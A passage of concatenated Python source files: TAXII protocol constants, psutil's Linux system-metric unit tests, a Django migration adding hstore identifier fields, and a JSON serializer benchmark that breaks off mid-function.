ST_UNSUPPORTED_MESSAGE_BINDING, ST_UNSUPPORTED_CONTENT_BINDING,
ST_UNSUPPORTED_PROTOCOL)
ST_ASYNCHRONOUS_POLL_ERROR = 'ASYNCHRONOUS_POLL_ERROR'
ST_DESTINATION_COLLECTION_ERROR = 'DESTINATION_COLLECTION_ERROR'
ST_INVALID_RESPONSE_PART = 'INVALID_RESPONSE_PART'
ST_NETWORK_ERROR = 'NETWORK_ERROR'
ST_PENDING = 'PENDING'
ST_UNSUPPORTED_QUERY = 'UNSUPPORTED_QUERY'
ST_TYPES_11 = (ST_ASYNCHRONOUS_POLL_ERROR, ST_BAD_MESSAGE, ST_DENIED,
ST_DESTINATION_COLLECTION_ERROR, ST_FAILURE, ST_INVALID_RESPONSE_PART,
ST_NETWORK_ERROR, ST_NOT_FOUND, ST_PENDING, ST_POLLING_UNSUPPORTED,
ST_RETRY, ST_SUCCESS, ST_UNAUTHORIZED, ST_UNSUPPORTED_MESSAGE_BINDING,
ST_UNSUPPORTED_CONTENT_BINDING, ST_UNSUPPORTED_PROTOCOL,
ST_UNSUPPORTED_QUERY)
ACT_SUBSCRIBE = 'SUBSCRIBE'
ACT_UNSUBSCRIBE = 'UNSUBSCRIBE'
ACT_STATUS = 'STATUS'
ACT_TYPES_10 = (ACT_SUBSCRIBE, ACT_UNSUBSCRIBE, ACT_STATUS)
ACT_PAUSE = 'PAUSE'
ACT_RESUME = 'RESUME'
ACT_TYPES_11 = (ACT_SUBSCRIBE, ACT_PAUSE, ACT_RESUME, ACT_UNSUBSCRIBE, ACT_STATUS)
SVC_INBOX = 'INBOX'
SVC_POLL = 'POLL'
SVC_FEED_MANAGEMENT = 'FEED_MANAGEMENT'
SVC_DISCOVERY = 'DISCOVERY'
SVC_TYPES_10 = (SVC_INBOX, SVC_POLL, SVC_FEED_MANAGEMENT, SVC_DISCOVERY)
SVC_COLLECTION_MANAGEMENT = 'COLLECTION_MANAGEMENT'
SVC_TYPES_11 = (SVC_INBOX, SVC_POLL, SVC_COLLECTION_MANAGEMENT, SVC_DISCOVERY)
SS_ACTIVE = 'ACTIVE'
SS_PAUSED = 'PAUSED'
SS_UNSUBSCRIBED = 'UNSUBSCRIBED'
SS_TYPES_11 = (SS_ACTIVE, SS_PAUSED, SS_UNSUBSCRIBED)
RT_FULL = 'FULL'
RT_COUNT_ONLY = 'COUNT_ONLY'
RT_TYPES_11 = (RT_FULL, RT_COUNT_ONLY)
CT_DATA_FEED = 'DATA_FEED'
CT_DATA_SET = 'DATA_SET'
CT_TYPES_11 = (CT_DATA_FEED, CT_DATA_SET)
SD_ACCEPTABLE_DESTINATION = 'ACCEPTABLE_DESTINATION'
SD_MAX_PART_NUMBER = 'MAX_PART_NUMBER'
SD_ITEM = 'ITEM'
SD_ESTIMATED_WAIT = 'ESTIMATED_WAIT'
SD_RESULT_ID = 'RESULT_ID'
SD_WILL_PUSH = 'WILL_PUSH'
SD_SUPPORTED_BINDING = 'SUPPORTED_BINDING'
SD_SUPPORTED_CONTENT = 'SUPPORTED_CONTENT'
SD_SUPPORTED_PROTOCOL = 'SUPPORTED_PROTOCOL'
SD_SUPPORTED_QUERY = 'SUPPORTED_QUERY'
SD_TYPES_11 = (SD_ACCEPTABLE_DESTINATION, SD_MAX_PART_NUMBER, SD_ITEM,
SD_ESTIMATED_WAIT, SD_RESULT_ID, SD_WILL_PUSH,
SD_SUPPORTED_BINDING, SD_SUPPORTED_CONTENT, SD_SUPPORTED_PROTOCOL,
SD_SUPPORTED_QUERY)
SD_CAPABILITY_MODULE = 'CAPABILITY_MODULE'
SD_PREFERRED_SCOPE = 'PREFERRED_SCOPE'
SD_ALLOWED_SCOPE = 'ALLOWED_SCOPE'
SD_TARGETING_EXPRESSION_ID = 'TARGETING_EXPRESSION_ID'
FID_TAXII_DEFAULT_QUERY_10 = 'urn:taxii.mitre.org:query:default:1.0'
CM_CORE = 'urn:taxii.mitre.org:query:capability:core-1'
CM_REGEX = 'urn:taxii.mitre.org:query:capability:regex-1'
CM_TIMESTAMP = 'urn:taxii.mitre.org:query:capability:timestamp-1'
CM_IDS = (CM_CORE, CM_REGEX, CM_TIMESTAMP)
OP_OR = 'OR'
OP_AND = 'AND'
OP_TYPES = (OP_OR, OP_AND)
ST_UNSUPPORTED_CAPABILITY_MODULE = 'UNSUPPORTED_CAPABILITY_MODULE'
ST_UNSUPPORTED_TARGETING_EXPRESSION = 'UNSUPPORTED_TARGETING_EXPRESSION'
ST_UNSUPPORTED_TARGETING_EXPRESSION_ID = 'UNSUPPORTED_TARGETING_EXPRESSION_ID'
P_VALUE = 'value'
P_MATCH_TYPE = 'match_type'
P_CASE_SENSITIVE = 'case_sensitive'
P_NAMES = (P_VALUE, P_MATCH_TYPE, P_CASE_SENSITIVE)
R_EQUALS = 'equals'
R_NOT_EQUALS = 'not_equals'
R_GREATER_THAN = 'greater_than'
R_GREATER_THAN_OR_EQUAL = 'greater_than_or_equal'
R_LESS_THAN = 'less_than'
R_LESS_THAN_OR_EQUAL = 'less_than_or_equal'
R_DOES_NOT_EXIST = 'does_not_exist'
R_EXISTS = 'exists'
R_BEGINS_WITH = 'begins_with'
R_ENDS_WITH = 'ends_with'
R_CONTAINS = 'contains'
R_MATCHES = 'matches'
R_NAMES = (R_EQUALS, R_NOT_EQUALS, R_GREATER_THAN,
R_GREATER_THAN_OR_EQUAL, R_LESS_THAN,
R_LESS_THAN_OR_EQUAL, R_DOES_NOT_EXIST,
R_EXISTS, R_BEGINS_WITH, R_ENDS_WITH,
R_CONTAINS, R_MATCHES)
VID_TAXII_SERVICES_10 = 'urn:taxii.mitre.org:services:1.0'
VID_TAXII_SERVICES_11 = 'urn:taxii.mitre.org:services:1.1'
VID_TAXII_XML_10 = 'urn:taxii.mitre.org:message:xml:1.0'
VID_TAXII_XML_11 = 'urn:taxii.mitre.org:message:xml:1.1'
VID_TAXII_HTTP_10 = 'urn:taxii.mitre.org:protocol:http:1.0'
VID_TAXII_HTTPS_10 = 'urn:taxii.mitre.org:protocol:https:1.0'
VID_CERT_EU_JSON_10 = 'urn:cert.europa.eu:message:json:1.0'
CB_STIX_XML_10 = 'urn:stix.mitre.org:xml:1.0'
CB_STIX_XML_101 = 'urn:stix.mitre.org:xml:1.0.1'
CB_STIX_XML_11 = 'urn:stix.mitre.org:xml:1.1'
CB_STIX_XML_111 = 'urn:stix.mitre.org:xml:1.1.1'
CB_CAP_11 = 'urn:oasis:names:tc:emergency:cap:1.1'
CB_XENC_122002 = 'http://www.w3.org/2001/04/xmlenc#'
CB_SMIME = 'application/x-pkcs7-mime'
STD_INDENT = ' ' # A "Standard Indent" to use for to_text() methods
|
"""Linux specific tests."""
import contextlib
import errno
import io
import os
import pprint
import re
import shutil
import socket
import struct
import tempfile
import textwrap
import time
import warnings
try:
from unittest import mock # py3
except ImportError:
import mock # requires "pip install mock"
import psutil
from psutil import LINUX
from psutil._compat import PY3
from psutil._compat import u
from psutil.tests import call_until
from psutil.tests import get_kernel_version
from psutil.tests import importlib
from psutil.tests import MEMORY_TOLERANCE
from psutil.tests import pyrun
from psutil.tests import reap_children
from psutil.tests import retry_before_failing
from psutil.tests import run_test_module_by_name
from psutil.tests import sh
from psutil.tests import skip_on_not_implemented
from psutil.tests import TESTFN
from psutil.tests import TRAVIS
from psutil.tests import unittest
from psutil.tests import which
HERE = os.path.abspath(os.path.dirname(__file__))
SIOCGIFADDR = 0x8915
SIOCGIFCONF = 0x8912
SIOCGIFHWADDR = 0x8927
def get_ipv4_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
return socket.inet_ntoa(
fcntl.ioctl(s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname))[20:24])
def get_mac_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
info = fcntl.ioctl(
s.fileno(), SIOCGIFHWADDR, struct.pack('256s', ifname))
if PY3:
def ord(x):
return x
else:
import __builtin__
ord = __builtin__.ord
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
def free_swap():
"""Parse 'free' cmd and return swap memory's s total, used and free
values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Swap'):
_, total, used, free = line.split()
return (int(total) * 1024, int(used) * 1024, int(free) * 1024)
def free_physmem():
"""Parse 'free' cmd and return physical memory's total, used
and free values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Mem'):
total, used, free, shared, buffers, cached = \
[int(x) * 1024 for x in line.split()[1:]]
return (total, used, free, shared, buffers, cached)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemMemory(unittest.TestCase):
def test_vmem_total(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertEqual(total, psutil.virtual_memory().total)
@retry_before_failing()
def test_vmem_used(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(used, psutil.virtual_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_free(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(free, psutil.virtual_memory().free,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_buffers(self):
buffers = int(sh('vmstat').split('\n')[2].split()[4]) * 1024
self.assertAlmostEqual(buffers, psutil.virtual_memory().buffers,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_cached(self):
cached = int(sh('vmstat').split('\n')[2].split()[5]) * 1024
self.assertAlmostEqual(cached, psutil.virtual_memory().cached,
delta=MEMORY_TOLERANCE)
def test_swapmem_total(self):
total, used, free = free_swap()
return self.assertAlmostEqual(total, psutil.swap_memory().total,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_used(self):
total, used, free = free_swap()
return self.assertAlmostEqual(used, psutil.swap_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_free(self):
total, used, free = free_swap()
return self.assertAlmostEqual(free, psutil.swap_memory().free,
delta=MEMORY_TOLERANCE)
# --- mocked tests
def test_virtual_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.virtual_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'cached', 'active' and 'inactive' memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.cached, 0)
self.assertEqual(ret.active, 0)
self.assertEqual(ret.inactive, 0)
def test_swap_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
def test_swap_memory_mocked_no_vmstat(self):
# see https://github.com/giampaolo/psutil/issues/722
with mock.patch('psutil._pslinux.open', create=True,
side_effect=IOError) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined and were set to 0",
str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemCPU(unittest.TestCase):
@unittest.skipIf(TRAVIS, "unknown failure on travis")
def test_cpu_times(self):
fields = psutil.cpu_times()._fields
kernel_ver = re.findall('\d+\.\d+\.\d+', os.uname()[2])[0]
kernel_ver_info = tuple(map(int, kernel_ver.split('.')))
if kernel_ver_info >= (2, 6, 11):
self.assertIn('steal', fields)
else:
self.assertNotIn('steal', fields)
if kernel_ver_info >= (2, 6, 24):
self.assertIn('guest', fields)
else:
self.assertNotIn('guest', fields)
if kernel_ver_info >= (3, 2, 0):
self.assertIn('guest_nice', fields)
else:
self.assertNotIn('guest_nice', fields)
@unittest.skipUnless(which("nproc"), "nproc utility not available")
def test_cpu_count_logical_w_nproc(self):
num = int(sh("nproc --all"))
self.assertEqual(psutil.cpu_count(logical=True), num)
@unittest.skipUnless(which("lscpu"), "lscpu utility not available")
def test_cpu_count_logical_w_lscpu(self):
out = sh("lscpu -p")
num = len([x for x in out.split('\n') if not x.startswith('#')])
self.assertEqual(psutil.cpu_count(logical=True), num)
def test_cpu_count_logical_mocked(self):
import psutil._pslinux
original = psutil._pslinux.cpu_count_logical()
# Here we want to mock os.sysconf("SC_NPROCESSORS_ONLN") in
# order to cause the parsing of /proc/cpuinfo and /proc/stat.
with mock.patch(
'psutil._pslinux.os.sysconf', side_effect=ValueError) as m:
self.assertEqual(psutil._pslinux.cpu_count_logical(), original)
assert m.called
# Let's have open() return emtpy data and make sure None is
# returned ('cause we mimick os.cpu_count()).
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertIsNone(psutil._pslinux.cpu_count_logical())
self.assertEqual(m.call_count, 2)
# /proc/stat should be the last one
self.assertEqual(m.call_args[0][0], '/proc/stat')
# Let's push this a bit further and make sure /proc/cpuinfo
# parsing works as expected.
with open('/proc/cpuinfo', 'rb') as f:
cpuinfo_data = f.read()
fake_file = io.BytesIO(cpuinfo_data)
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
self.assertEqual(psutil._pslinux.cpu_count_logical(), original)
def test_cpu_count_physical_mocked(self):
# Have open() return emtpy data and make sure None is returned
# ('cause we want to mimick os.cpu_count())
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertIsNone(psutil._pslinux.cpu_count_physical())
assert m.called
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemNetwork(unittest.TestCase):
def test_net_if_addrs_ips(self):
for name, addrs in psutil.net_if_addrs().items():
for addr in addrs:
if addr.family == psutil.AF_LINK:
self.assertEqual(addr.address, get_mac_address(name))
elif addr.family == socket.AF_INET:
self.assertEqual(addr.address, get_ipv4_address(name))
# TODO: test for AF_INET6 family
@unittest.skipUnless(which('ip'), "'ip' utility not available")
@unittest.skipIf(TRAVIS, "skipped on Travis")
def test_net_if_names(self):
out = sh("ip addr").strip()
nics = [x for x in psutil.net_if_addrs().keys() if ':' not in x]
found = 0
for line in out.split('\n'):
line = line.strip()
if re.search("^\d+:", line):
found += 1
name = line.split(':')[1].strip()
self.assertIn(name, nics)
self.assertEqual(len(nics), found, msg="%s\n---\n%s" % (
pprint.pformat(nics), out))
@mock.patch('psutil._pslinux.socket.inet_ntop', side_effect=ValueError)
@mock.patch('psutil._pslinux.supports_ipv6', return_value=False)
def test_net_connections_ipv6_unsupported(self, supports_ipv6, inet_ntop):
# see: https://github.com/giampaolo/psutil/issues/623
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(("::1", 0))
except socket.error:
pass
psutil.net_connections(kind='inet6')
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemDisks(unittest.TestCase):
@unittest.skipUnless(
hasattr(os, 'statvfs'), "os.statvfs() function not available")
@skip_on_not_implemented()
def test_disk_partitions_and_usage(self):
# test psutil.disk_usage() and psutil.disk_partitions()
# against "df -a"
def df(path):
out = sh('df -P -B 1 "%s"' % path).strip()
lines = out.split('\n')
lines.pop(0)
line = lines.pop(0)
dev, total, used, free = line.split()[:4]
if dev == 'none':
dev = ''
total, used, free = int(total), int(used), int(free)
return dev, total, used, free
for part in psutil.disk_partitions(all=False):
usage = psutil.disk_usage(part.mountpoint)
dev, total, used, free = df(part.mountpoint)
self.assertEqual(usage.total, total)
# 10 MB tollerance
if abs(usage.free - free) > 10 * 1024 * 1024:
self.fail("psutil=%s, df=%s" % (usage.free, free))
if abs(usage.used - used) > 10 * 1024 * 1024:
self.fail("psutil=%s, df=%s" % (usage.used, used))
def test_disk_partitions_mocked(self):
# Test that ZFS partitions are returned.
with open("/proc/filesystems", "r") as f:
data = f.read()
if 'zfs' in data:
for part in psutil.disk_partitions():
if part.fstype == 'zfs':
break
else:
self.fail("couldn't find any ZFS partition")
else:
# No ZFS partitions on this system. Let's fake one.
fake_file = io.StringIO(u("nodev\tzfs\n"))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m1:
with mock.patch(
'psutil._pslinux.cext.disk_partitions',
return_value=[('/dev/sdb3', '/', 'zfs', 'rw')]) as m2:
ret = psutil.disk_partitions()
assert m1.called
assert m2.called
assert ret
self.assertEqual(ret[0].fstype, 'zfs')
@unittest.skipUnless(LINUX, "not a Linux system")
class TestMisc(unittest.TestCase):
@mock.patch('psutil.traceback.print_exc')
def test_no_procfs_on_import(self, tb):
my_procfs = tempfile.mkdtemp()
with open(os.path.join(my_procfs, 'stat'), 'w') as f:
f.write('cpu 0 0 0 0 0 0 0 0 0 0\n')
f.write('cpu0 0 0 0 0 0 0 0 0 0 0\n')
f.write('cpu1 0 0 0 0 0 0 0 0 0 0\n')
try:
orig_open = open
def open_mock(name, *args):
if name.startswith('/proc'):
raise IOError(errno.ENOENT, 'rejecting access for test')
return orig_open(name, *args)
patch_point = 'builtins.open' if PY3 else '__builtin__.open'
with mock.patch(patch_point, side_effect=open_mock):
importlib.reload(psutil)
assert tb.called
self.assertRaises(IOError, psutil.cpu_times)
self.assertRaises(IOError, psutil.cpu_times, percpu=True)
self.assertRaises(IOError, psutil.cpu_percent)
self.assertRaises(IOError, psutil.cpu_percent, percpu=True)
self.assertRaises(IOError, psutil.cpu_times_percent)
self.assertRaises(
IOError, psutil.cpu_times_percent, percpu=True)
psutil.PROCFS_PATH = my_procfs
self.assertEqual(psutil.cpu_percent(), 0)
self.assertEqual(sum(psutil.cpu_times_percent()), 0)
# since we don't know the number of CPUs at import time,
# we awkwardly say there are none until the second call
per_cpu_percent = psutil.cpu_percent(percpu=True)
self.assertEqual(sum(per_cpu_percent), 0)
# ditto awkward length
per_cpu_times_percent = psutil.cpu_times_percent(percpu=True)
self.assertEqual(sum(map(sum, per_cpu_times_percent)), 0)
# much user, very busy
with open(os.path.join(my_procfs, 'stat'), 'w') as f:
f.write('cpu 1 0 0 0 0 0 0 0 0 0\n')
f.write('cpu0 1 0 0 0 0 0 0 0 0 0\n')
f.write('cpu1 1 0 0 0 0 0 0 0 0 0\n')
self.assertNotEqual(psutil.cpu_percent(), 0)
self.assertNotEqual(
sum(psutil.cpu_percent(percpu=True)), 0)
self.assertNotEqual(sum(psutil.cpu_times_percent()), 0)
self.assertNotEqual(
sum(map(sum, psutil.cpu_times_percent(percpu=True))), 0)
finally:
shutil.rmtree(my_procfs)
importlib.reload(psutil)
self.assertEqual(psutil.PROCFS_PATH, '/proc')
@unittest.skipUnless(
get_kernel_version() >= (2, 6, 36),
"prlimit() not available on this Linux kernel version")
def test_prlimit_availability(self):
# prlimit() should be available starting from kernel 2.6.36
p = psutil.Process(os.getpid())
p.rlimit(psutil.RLIMIT_NOFILE)
# if prlimit() is supported *at least* these constants should
# be available
self.assertTrue(hasattr(psutil, "RLIM_INFINITY"))
self.assertTrue(hasattr(psutil, "RLIMIT_AS"))
self.assertTrue(hasattr(psutil, "RLIMIT_CORE"))
self.assertTrue(hasattr(psutil, "RLIMIT_CPU"))
self.assertTrue(hasattr(psutil, "RLIMIT_DATA"))
self.assertTrue(hasattr(psutil, "RLIMIT_FSIZE"))
self.assertTrue(hasattr(psutil, "RLIMIT_LOCKS"))
self.assertTrue(hasattr(psutil, "RLIMIT_MEMLOCK"))
self.assertTrue(hasattr(psutil, "RLIMIT_NOFILE"))
self.assertTrue(hasattr(psutil, "RLIMIT_NPROC"))
self.assertTrue(hasattr(psutil, "RLIMIT_RSS"))
self.assertTrue(hasattr(psutil, "RLIMIT_STACK"))
@unittest.skipUnless(
get_kernel_version() >= (3, 0),
"prlimit constants not available on this Linux kernel version")
def test_resource_consts_kernel_v(self):
# more recent constants
self.assertTrue(hasattr(psutil, "RLIMIT_MSGQUEUE"))
self.assertTrue(hasattr(psutil, "RLIMIT_NICE"))
self.assertTrue(hasattr(psutil, "RLIMIT_RTPRIO"))
self.assertTrue(hasattr(psutil, "RLIMIT_RTTIME"))
self.assertTrue(hasattr(psutil, "RLIMIT_SIGPENDING"))
def test_boot_time_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
RuntimeError,
psutil._pslinux.boot_time)
assert m.called
def test_users_mocked(self):
# Make sure ':0' and ':0.0' (returned by C ext) are converted
# to 'localhost'.
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', ':0',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'localhost')
assert m.called
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', ':0.0',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'localhost')
assert m.called
# ...otherwise it should be returned as-is
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', 'foo',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'foo')
assert m.called
def test_procfs_path(self):
tdir = tempfile.mkdtemp()
try:
psutil.PROCFS_PATH = tdir
self.assertRaises(IOError, psutil.virtual_memory)
self.assertRaises(IOError, psutil.cpu_times)
self.assertRaises(IOError, psutil.cpu_times, percpu=True)
self.assertRaises(IOError, psutil.boot_time)
# self.assertRaises(IOError, psutil.pids)
self.assertRaises(IOError, psutil.net_connections)
self.assertRaises(IOError, psutil.net_io_counters)
self.assertRaises(IOError, psutil.net_if_stats)
self.assertRaises(IOError, psutil.disk_io_counters)
self.assertRaises(IOError, psutil.disk_partitions)
self.assertRaises(psutil.NoSuchProcess, psutil.Process)
finally:
psutil.PROCFS_PATH = "/proc"
os.rmdir(tdir)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestProcess(unittest.TestCase):
def test_memory_maps(self):
src = textwrap.dedent("""
import time
with open("%s", "w") as f:
time.sleep(10)
""" % TESTFN)
sproc = pyrun(src)
self.addCleanup(reap_children)
call_until(lambda: os.listdir('.'), "'%s' not in ret" % TESTFN)
p = psutil.Process(sproc.pid)
time.sleep(.1)
maps = p.memory_maps(grouped=False)
pmap = sh('pmap -x %s' % p.pid).split('\n')
# get rid of header
del pmap[0]
del pmap[0]
while maps and pmap:
this = maps.pop(0)
other = pmap.pop(0)
addr, _, rss, dirty, mode, path = other.split(None, 5)
if not path.startswith('[') and not path.endswith(']'):
self.assertEqual(path, os.path.basename(this.path))
self.assertEqual(int(rss) * 1024, this.rss)
# test only rwx chars, ignore 's' and 'p'
self.assertEqual(mode[:3], this.perms[:3])
def test_memory_addrspace_info(self):
src = textwrap.dedent("""
import time
with open("%s", "w") as f:
time.sleep(10)
""" % TESTFN)
sproc = pyrun(src)
self.addCleanup(reap_children)
call_until(lambda: os.listdir('.'), "'%s' not in ret" % TESTFN)
p = psutil.Process(sproc.pid)
time.sleep(.1)
mem = p.memory_addrspace_info()
maps = p.memory_maps(grouped=False)
self.assertEqual(
mem.uss, sum([x.private_dirty + x.private_clean for x in maps]))
self.assertEqual(
mem.pss, sum([x.pss for x in maps]))
self.assertEqual(
mem.swap, sum([x.swap for x in maps]))
def test_open_files_file_gone(self):
# simulates a file which gets deleted during open_files()
# execution
p = psutil.Process()
files = p.open_files()
with tempfile.NamedTemporaryFile():
# give the kernel some time to see the new file
call_until(p.open_files, "len(ret) != %i" % len(files))
with mock.patch('psutil._pslinux.os.readlink',
side_effect=OSError(errno.ENOENT, "")) as m:
files = p.open_files()
assert not files
assert m.called
# also simulate the case where os.readlink() returns EINVAL
# in which case psutil is supposed to 'continue'
with mock.patch('psutil._pslinux.os.readlink',
side_effect=OSError(errno.EINVAL, "")) as m:
self.assertEqual(p.open_files(), [])
assert m.called
# --- mocked tests
def test_terminal_mocked(self):
with mock.patch('psutil._pslinux._psposix._get_terminal_map',
return_value={}) as m:
self.assertIsNone(psutil._pslinux.Process(os.getpid()).terminal())
assert m.called
def test_num_ctx_switches_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).num_ctx_switches)
assert m.called
def test_num_threads_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).num_threads)
assert m.called
def test_ppid_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).ppid)
assert m.called
def test_uids_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).uids)
assert m.called
def test_gids_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).gids)
assert m.called
def test_cmdline_mocked(self):
# see: https://github.com/giampaolo/psutil/issues/639
p = psutil.Process()
fake_file = io.StringIO(u('foo\x00bar\x00'))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
p.cmdline() == ['foo', 'bar']
assert m.called
fake_file = io.StringIO(u('foo\x00bar\x00\x00'))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
p.cmdline() == ['foo', 'bar', '']
assert m.called
def test_io_counters_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).io_counters)
assert m.called
def test_readlink_path_deleted_mocked(self):
with mock.patch('psutil._pslinux.os.readlink',
return_value='/home/foo (deleted)'):
self.assertEqual(psutil.Process().exe(), "/home/foo")
self.assertEqual(psutil.Process().cwd(), "/home/foo")
if __name__ == '__main__':
run_test_module_by_name(__file__)
|
from django.db import migrations, models
import django.contrib.postgres.fields.hstore
class Migration(migrations.Migration):
dependencies = [
('hs_core', '0035_remove_deprecated_fields'),
]
operations = [
migrations.AddField(
model_name='contributor',
name='identifiers',
field=django.contrib.postgres.fields.hstore.HStoreField(default={}),
),
migrations.AddField(
model_name='creator',
name='identifiers',
field=django.contrib.postgres.fields.hstore.HStoreField(default={}),
),
]
|
import random
import sys
import time
import pytest
try:
import yajl
except ImportError:
yajl = None
try:
import simplejson
except ImportError:
simplejson = None
try:
import json
except ImportError:
json = None
try:
import rapidjson
except ImportError:
rapidjson = None
try:
import ujson
except ImportError:
ujson = None
default_data = {
'words': """
Lorem ipsum dolor sit amet, consectetur adipiscing
elit. Mauris adipiscing adipiscing placerat.
Vestibulum augue augue,
pellentesque quis sollicitudin id, adipiscing.
""",
'list': list(range(200)),
'dict': dict((str(i), 'a') for i in list(range(200))),
'int': 100100100,
'float': 100999.123456
}
user = {
"userId": 3381293,
"age": 213,
"username": "johndoe",
"fullname": u"John Doe the Second",
"isAuthorized": True,
"liked": 31231.31231202,
"approval": 31.1471,
"jobs": [1, 2],
"currJob": None
}
friends = [user, user, user, user, user, user, user, user]
def time_func(func, data, iterations):
start = time.time()
while iterations:
iterations -= 1
func(data)
return time.time() - start
def run_client_test(
name, serialize, deserialize, iterations=100 * 1000, data=default_data
):
squashed_data = serialize(data)
serialize_profile = time_func(serialize, data, iterations)
deserialize_profile = time_func(deserialize, squashed_data, iterations)
return serialize_profile, deserialize_profile
contenders = []
if yajl:
contenders.append(('yajl', yajl.Encoder().encode, yajl.Decoder().decode))
if simplejson:
contenders.append(('simplejson', simplejson.dumps, simplejson.loads))
if json:
contenders.append(('stdlib json', json.dumps, json.loads))
if rapidjson:
contenders.append(
('rapidjson', rapidjson.dumps, rapidjson.loads)
)
if ujson:
contenders.append(
('ujson', ujson.dumps, ujson.loads)
)
doubles = []
unicode_strings = []
strings = []
booleans = []
list_dicts = []
dict_lists = {}
medium_complex = [
[user, friends], [user, friends], [user, friends],
[user, friends], [user, friends], [user, friends]
]
for x in range(256):
doubles.append(sys.maxsize * random.random())
unicode_strings.append(
"نظام الحكم سلطاني وراثي في الذكور من ذرية السيد تركي بن سعيد بن سلطان ويشترط فيمن يختار لولاية الحكم من بينهم ان يكون مسلما رشيدا عاقلا ًوابنا شرعيا لابوين عمانيين ")
strings.append("A pretty long string which is in a list")
booleans.append(True)
for y in range(100):
arrays = []
list_dicts.append({str(random.random() * 20): int(random.random() * 1000000)})
for x in range(100):
arrays.append({str(random.random() * 20): int(random.random() * 1000000)})
dict_lists[str(random.random() * 20)] = arrays
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_serialization(name, serialize, deserialize, benchmark):
ser_data, des_data = benchmark(run_client_test, name, serialize, deserialize)
msg = "\n%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_unicode_strings(name, serialize, deserialize, benchmark):
print("\nArray with 256 unicode strings:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=unicode_strings,
iterations=5000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_scii_strings(name, serialize, deserialize, benchmark):
print("\nArray with 256 ascii strings:")
ser_data, des_data = benchmark(run_client_test,
